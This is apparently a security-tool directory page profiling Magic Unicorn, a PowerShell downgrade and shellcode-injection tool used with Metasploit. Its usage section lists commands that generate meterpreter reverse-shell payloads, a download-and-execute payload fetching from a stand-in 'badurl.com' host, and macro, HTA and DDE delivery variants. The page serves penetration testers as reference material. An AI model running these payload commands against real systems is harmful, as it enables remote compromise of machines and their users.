Magic Unicorn
Tool and Usage
Project details
- License
- Custom license
- Programming language
- Python
- Author
- David Kennedy
- Latest release
- 3.17
- Latest release date
Links
GitHub project
Why this tool?
Magic Unicorn is a tool to perform a PowerShell downgrade attack and inject shellcode into memory.
How it works
The tool is used together with Metasploit. Once Magic Unicorn is located within the right path, execute the tool. On execution, it generates a PowerShell command that can be pasted into a command-line window. Another option is to use a payload delivery system from within Metasploit.
Background information
Magic Unicorn is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy and Josh Kelly at DEF CON 18.
Usage and audience
Magic Unicorn is commonly used for penetration testing or shellcode injection. Target users for this tool are pentesters and security professionals.
Features
- Command line interface
Example usage and output
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
Tool review and remarks
The review and analysis of this project resulted in the following remarks for this security tool:
Strengths
- More than 1000 GitHub stars
- Many releases available
- The source code of this software is available
History and highlights
- Demo at DEF CON 26 Demo Labs
Installation
Supported operating systems
Magic Unicorn is known to work on Linux.
Related tool information
Categories
This tool is categorized as a PowerShell exploitation tool.